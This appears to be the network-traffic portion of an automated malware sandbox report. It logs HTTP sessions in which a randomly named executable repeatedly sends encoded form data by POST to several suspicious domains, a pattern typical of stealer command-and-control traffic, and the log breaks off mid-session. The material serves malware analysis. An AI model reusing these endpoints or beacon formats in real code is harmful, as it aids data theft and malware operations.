                                                                            4192.168.2.124972013.248.169.48805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:36:30.076904058 CET514OUTGET /440l/?BHptZ6F=9t5r8PtstBUGfqpIeh5XnEiswD9luMiEeVsajtw7Z3dqDkGB8mLGChY9CqfKEaHyEvKJDzANYYXJmO8Xh0K1SfJD5xex/OhwsPZZ5DEaSUshfqY+26Bd8yM=&RZ=0nkpmZbx9Z4P2 HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.egyshare.xyz
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Dec 6, 2024 17:36:31.168250084 CET381INHTTP/1.1 200 OK
                                                                            content-type: text/html
                                                                            date: Fri, 06 Dec 2024 16:36:31 GMT
                                                                            content-length: 260
                                                                            connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 42 48 70 74 5a 36 46 3d 39 74 35 72 38 50 74 73 74 42 55 47 66 71 70 49 65 68 35 58 6e 45 69 73 77 44 39 6c 75 4d 69 45 65 56 73 61 6a 74 77 37 5a 33 64 71 44 6b 47 42 38 6d 4c 47 43 68 59 39 43 71 66 4b 45 61 48 79 45 76 4b 4a 44 7a 41 4e 59 59 58 4a 6d 4f 38 58 68 30 4b 31 53 66 4a 44 35 78 65 78 2f 4f 68 77 73 50 5a 5a 35 44 45 61 53 55 73 68 66 71 59 2b 32 36 42 64 38 79 4d 3d 26 52 5a 3d 30 6e 6b 70 6d 5a 62 78 39 5a 34 50 32 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?BHptZ6F=9t5r8PtstBUGfqpIeh5XnEiswD9luMiEeVsajtw7Z3dqDkGB8mLGChY9CqfKEaHyEvKJDzANYYXJmO8Xh0K1SfJD5xex/OhwsPZZ5DEaSUshfqY+26Bd8yM=&RZ=0nkpmZbx9Z4P2"}</script></head></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.124972184.32.84.32805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:36:36.840020895 CET787OUTPOST /8mlm/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.appsolucao.shop
                                                                            Origin: http://www.appsolucao.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 204
                                                                            Referer: http://www.appsolucao.shop/8mlm/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 4f 71 47 65 65 44 47 36 74 74 6b 4e 49 59 73 6d 56 43 59 65 4b 45 4d 4f 43 77 38 55 70 4d 66 4e 6f 4d 4a 62 39 75 2f 34 7a 4c 2b 6a 47 33 61 56 34 76 6b 6c 4d 56 50 79 78 46 70 68 7a 66 46 50 50 2f 68 65 47 4a 77 75 51 70 6c 6f 45 5a 65 63 65 71 56 68 55 31 78 43 2b 77 62 4b 41 63 36 33 4e 51 6e 4a 4c 50 72 58 56 75 55 5a 34 6d 75 6d 77 44 4e 77 59 53 7a 44 36 79 74 61 58 6d 32 58 33 2b 5a 48 6e 56 46 33 74 76 77 2b 4f 53 4d 38 59 2b 67 55 38 49 55 67 34 48 31 73 46 4d 38 37 4c 6e 39 41 69 2b 41 55 64 2b 79 32 41 55 34 49 6a 36 79 5a 70 4e 6a 77 64 33 45 74 58 77 48 2f 44 77 3d 3d
                                                                            Data Ascii: BHptZ6F=OqGeeDG6ttkNIYsmVCYeKEMOCw8UpMfNoMJb9u/4zL+jG3aV4vklMVPyxFphzfFPP/heGJwuQploEZeceqVhU1xC+wbKAc63NQnJLPrXVuUZ4mumwDNwYSzD6ytaXm2X3+ZHnVF3tvw+OSM8Y+gU8IUg4H1sFM87Ln9Ai+AUd+y2AU4Ij6yZpNjwd3EtXwH/Dw==


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.124972284.32.84.32805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:36:39.990334988 CET807OUTPOST /8mlm/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.appsolucao.shop
                                                                            Origin: http://www.appsolucao.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 224
                                                                            Referer: http://www.appsolucao.shop/8mlm/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 4f 71 47 65 65 44 47 36 74 74 6b 4e 4a 37 30 6d 53 6a 59 65 62 30 4d 52 4e 51 38 55 6a 73 66 42 6f 4d 46 62 39 73 54 6f 7a 35 4b 6a 48 56 43 56 35 75 6b 6c 4c 56 50 79 36 6c 70 75 75 76 45 42 50 2f 64 4a 47 4d 49 75 51 70 5a 6f 45 62 47 63 5a 5a 4e 69 56 6c 77 6b 31 51 62 55 45 63 36 33 4e 51 6e 4a 4c 50 75 41 56 75 63 5a 34 56 6d 6d 2f 47 74 7a 53 79 7a 4d 73 69 74 61 54 6d 32 54 33 2b 5a 68 6e 58 67 63 74 71 73 2b 4f 57 41 38 59 71 30 58 31 49 56 6c 38 48 31 79 47 5a 52 49 4d 48 74 2f 6a 64 38 71 51 76 4b 70 42 53 31 53 38 49 36 50 38 4f 33 39 51 67 39 64 61 7a 36 32 59 37 65 57 54 47 4f 4e 65 50 55 2b 72 39 6a 79 4b 32 78 68 6a 54 67 3d
                                                                            Data Ascii: BHptZ6F=OqGeeDG6ttkNJ70mSjYeb0MRNQ8UjsfBoMFb9sToz5KjHVCV5uklLVPy6lpuuvEBP/dJGMIuQpZoEbGcZZNiVlwk1QbUEc63NQnJLPuAVucZ4Vmm/GtzSyzMsitaTm2T3+ZhnXgctqs+OWA8Yq0X1IVl8H1yGZRIMHt/jd8qQvKpBS1S8I6P8O39Qg9daz62Y7eWTGONePU+r9jyK2xhjTg=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.124972384.32.84.32805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:36:42.660023928 CET1820OUTPOST /8mlm/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.appsolucao.shop
                                                                            Origin: http://www.appsolucao.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 1236
                                                                            Referer: http://www.appsolucao.shop/8mlm/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 4f 71 47 65 65 44 47 36 74 74 6b 4e 4a 37 30 6d 53 6a 59 65 62 30 4d 52 4e 51 38 55 6a 73 66 42 6f 4d 46 62 39 73 54 6f 7a 35 53 6a 48 6d 4b 56 34 4a 51 6c 4b 56 50 79 68 46 70 74 75 76 46 64 50 2f 30 68 47 4d 30 2b 51 76 56 6f 45 34 4f 63 63 6f 4e 69 4d 31 77 6b 36 77 62 4a 41 63 36 6d 4e 52 58 4e 4c 4d 47 41 56 75 63 5a 34 56 4b 6d 32 7a 4e 7a 55 79 7a 44 36 79 74 65 58 6d 32 37 33 34 77 61 6e 58 31 6e 74 65 67 2b 4f 79 73 38 64 66 67 58 30 6f 56 6e 37 48 30 68 47 5a 56 58 4d 48 77 4f 6a 63 49 41 51 76 79 70 42 58 46 4a 76 35 2b 73 72 4f 50 42 58 54 6f 79 54 55 71 7a 55 70 2b 53 64 33 4b 51 63 50 73 70 7a 39 4f 58 65 55 70 2f 69 56 68 2b 37 6e 74 4f 59 70 2f 64 72 67 75 65 35 48 50 63 4f 7a 63 59 52 6d 4d 71 50 67 42 59 31 6b 53 6a 6a 34 44 54 70 4e 73 7a 74 37 67 67 72 68 64 33 2f 4e 78 65 59 49 54 79 39 31 44 62 75 56 49 7a 4e 4b 68 59 2b 36 4b 4b 2b 78 65 62 6f 42 36 44 48 38 45 2b 42 52 58 30 31 39 4a 45 50 76 79 66 35 42 56 48 7a 6d 6f 5a 79 72 58 6e 37 74 33 58 6a 31 [TRUNCATED]
                                                                            Data Ascii: BHptZ6F=OqGeeDG6ttkNJ70mSjYeb0MRNQ8UjsfBoMFb9sToz5SjHmKV4JQlKVPyhFptuvFdP/0hGM0+QvVoE4OccoNiM1wk6wbJAc6mNRXNLMGAVucZ4VKm2zNzUyzD6yteXm2734wanX1nteg+Oys8dfgX0oVn7H0hGZVXMHwOjcIAQvypBXFJv5+srOPBXToyTUqzUp+Sd3KQcPspz9OXeUp/iVh+7ntOYp/drgue5HPcOzcYRmMqPgBY1kSjj4DTpNszt7ggrhd3/NxeYITy91DbuVIzNKhY+6KK+xeboB6DH8E+BRX019JEPvyf5BVHzmoZyrXn7t3Xj128Q8OawJ1+PjCmrCegy+9Wa6KCcX2qMVrwKJ6zCCHX7365zlhzY4nx95gZ/H6G38J6RMZAawOgqgs9k2mme0UiaSniUeRLT9YgEGVYs8v6wEdvz5eIHQ2jwbQdLjQl9d7GOjOVnWC6aUzHnc9fC4M6q5GX3JUH+XnvHAkO9uvTQU+Es+LeEqHNapZHpQw0tSGaci1xmwkIV5vcfrFug/Qz3CDRx1ovu8YczgUcYmdzW7Q+Z1I5E1Bc9K49lhNvoeo61LLwf2YShtLsSj4XO2kz0wTdFyi74dojgwEgAU71tcHuV969sNiA0XVr+JdaHJi3blpmfpWLEXNxwNilubS06IwAQXd4EzQyyYG0fHD+A4ZdiIjR4ia7azPKV/h+x/3WsD1h0Yz5/tucFIULDjr/pKFyUjpVd3ZBV/WUt6IpQKeuOlbTDm6UPEVIV3oAWEr7W5JX1W/PJ8uFqlh8EnRRMVWjC9hCYz2KAb9/6j5tGTAA45vNK6p77YcTtJLosPdoxiC49H8DGQpsAj033yB/cq161DNxDcMaIZjXzmVRSEYzbrC/Hq5uRkRGQL2x0VYUyZdveWzNxrf+Vqw/zpNSZDtMfVV9NCrhK3OR/6bA1Xafhkwbu1kUCor9oqBh2PIf7CplcABQjAjv74PpUugAvaBAJNVm+nGR [TRUNCATED]


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.124972484.32.84.32805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:36:45.312066078 CET517OUTGET /8mlm/?BHptZ6F=Dou+d174n903Q5s8eGVlbncTBC0Rpufru8Nex+2NzpzCLkW84PIBEnPU/VIOuudaHO13J+F+WsJAELWMIa4GeHkI0XjsMpOmPR3vOajhWYhkzVz3w31CV1o=&RZ=0nkpmZbx9Z4P2 HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.appsolucao.shop
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Dec 6, 2024 17:36:46.399652958 CET1236INHTTP/1.1 200 OK
                                                                            Date: Fri, 06 Dec 2024 16:36:46 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 9973
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Server: hcdn
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            x-hcdn-request-id: b62d18ce018024e44e3d29ce9446af42-bos-edge3
                                                                            Expires: Fri, 06 Dec 2024 16:36:45 GMT
                                                                            Cache-Control: no-cache
                                                                            Accept-Ranges: bytes
                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                            Dec 6, 2024 17:36:46.399677038 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                            Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                                            Dec 6, 2024 17:36:46.399691105 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                                            Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                                            Dec 6, 2024 17:36:46.399732113 CET1236INData Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                            Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                                                            Dec 6, 2024 17:36:46.399786949 CET1236INData Raw: 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 6d 79 4e 61 76 62 61 72 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 6e 61
                                                                            Data Ascii: =120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials
                                                                            Dec 6, 2024 17:36:46.399799109 CET1236INData Raw: 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3e 42 75 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73
                                                                            Data Ascii: s=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and user-friendly website hosting for your successful online projects.</p><br><a href=https://www.hosti
                                                                            Dec 6, 2024 17:36:46.399811983 CET1236INData Raw: 64 65 41 74 28 74 2b 2b 29 29 29 29 7b 69 66 28 65 3d 6f 2e 63 68 61 72 43 6f 64 65 41 74 28 74 2b 2b 29 2c 35 35 32 39 36 21 3d 28 36 34 35 31 32 26 72 29 7c 7c 35 36 33 32 30 21 3d 28 36 34 35 31 32 26 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52
                                                                            Data Ascii: deAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023&r)<<10)+(1023&e)+65536}n.push(r)}return n},encode:function(o){for(var r,e=[],n=0,t=o.length;n<t;){i
                                                                            Dec 6, 2024 17:36:46.400084019 CET1236INData Raw: 70 2c 73 3c 28 43 3d 67 3c 3d 69 3f 31 3a 69 2b 32 36 3c 3d 67 3f 32 36 3a 67 2d 69 29 29 62 72 65 61 6b 3b 69 66 28 70 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 28 6f 2d 43 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e
                                                                            Data Ascii: p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("punycode_overflow(3)");a+=Math.floor(f/h),f%=h,t&&y.splice(f,0,e.
                                                                            Dec 6, 2024 17:36:46.400095940 CET424INData Raw: 2e 73 70 6c 69 74 28 22 2e 22 29 2c 65 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 72 2e 6c 65 6e 67 74 68 3b 2b 2b 6e 29 7b 76 61 72 20 74 3d 72 5b 6e 5d 3b 65 2e 70 75 73 68 28 74 2e 6d 61 74 63 68 28 2f 5b 5e 41 2d 5a 61 2d 7a 30 2d 39 2d 5d 2f 29 3f 22 78
                                                                            Data Ascii: .split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/^xn--/)?puny


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.124972584.32.84.32805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:36:51.862488985 CET787OUTPOST /3ifu/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.samundri.online
                                                                            Origin: http://www.samundri.online
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 204
                                                                            Referer: http://www.samundri.online/3ifu/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 6a 37 41 44 38 59 71 51 6c 51 4f 72 67 62 79 68 34 36 74 56 6b 33 6d 6f 77 65 72 32 63 34 39 76 43 4b 36 51 2f 5a 34 77 73 34 43 69 61 4b 56 48 56 33 39 36 32 39 64 74 65 49 6c 30 4a 76 50 47 58 54 46 70 51 78 78 42 56 36 37 75 62 50 70 48 62 4c 38 51 6c 69 6b 37 69 51 62 39 78 47 56 65 4e 75 45 31 70 79 38 77 70 6f 34 54 52 32 6b 4c 55 64 37 61 79 4d 4d 36 4d 34 4a 74 7a 4f 6f 72 59 4e 5a 41 45 61 58 6b 45 36 49 74 56 52 50 43 5a 6e 61 32 37 74 33 79 51 58 38 4a 74 45 70 68 37 38 75 70 41 32 46 7a 41 4c 31 78 51 36 37 54 39 70 53 49 2f 70 66 79 73 4b 5a 65 45 78 70 5a 67 77 3d 3d
                                                                            Data Ascii: BHptZ6F=j7AD8YqQlQOrgbyh46tVk3mower2c49vCK6Q/Z4ws4CiaKVHV39629dteIl0JvPGXTFpQxxBV67ubPpHbL8Qlik7iQb9xGVeNuE1py8wpo4TR2kLUd7ayMM6M4JtzOorYNZAEaXkE6ItVRPCZna27t3yQX8JtEph78upA2FzAL1xQ67T9pSI/pfysKZeExpZgw==


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.124972684.32.84.32805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:36:54.524584055 CET807OUTPOST /3ifu/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.samundri.online
                                                                            Origin: http://www.samundri.online
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 224
                                                                            Referer: http://www.samundri.online/3ifu/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 6a 37 41 44 38 59 71 51 6c 51 4f 72 6d 35 6d 68 2f 5a 56 56 7a 48 6d 72 2b 2b 72 32 4c 6f 39 72 43 4b 6d 51 2f 59 4e 33 76 4e 61 69 61 71 46 48 55 30 6c 36 31 39 64 74 47 34 6c 31 4e 76 50 33 58 54 5a 58 51 7a 6c 42 56 36 76 75 62 4b 4e 48 61 38 6f 58 6c 79 6b 6c 38 77 62 37 38 6d 56 65 4e 75 45 31 70 79 59 4b 70 6f 77 54 52 47 55 4c 55 38 37 64 30 38 4d 35 61 6f 4a 74 6b 65 6f 6e 59 4e 5a 75 45 62 62 61 45 34 77 74 56 52 2f 43 59 30 43 33 75 39 33 77 50 6e 39 4e 69 45 49 50 31 4e 43 35 42 47 4a 58 41 4a 70 37 56 38 32 4a 69 62 61 65 71 71 4c 2f 68 64 67 75 4a 79 55 51 37 34 69 6e 32 7a 41 74 49 6f 37 35 4b 36 42 44 49 63 70 6b 4e 59 41 3d
                                                                            Data Ascii: BHptZ6F=j7AD8YqQlQOrm5mh/ZVVzHmr++r2Lo9rCKmQ/YN3vNaiaqFHU0l619dtG4l1NvP3XTZXQzlBV6vubKNHa8oXlykl8wb78mVeNuE1pyYKpowTRGULU87d08M5aoJtkeonYNZuEbbaE4wtVR/CY0C3u93wPn9NiEIP1NC5BGJXAJp7V82JibaeqqL/hdguJyUQ74in2zAtIo75K6BDIcpkNYA=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            11192.168.2.124972884.32.84.32805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:36:57.195537090 CET1820OUTPOST /3ifu/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.samundri.online
                                                                            Origin: http://www.samundri.online
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 1236
                                                                            Referer: http://www.samundri.online/3ifu/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
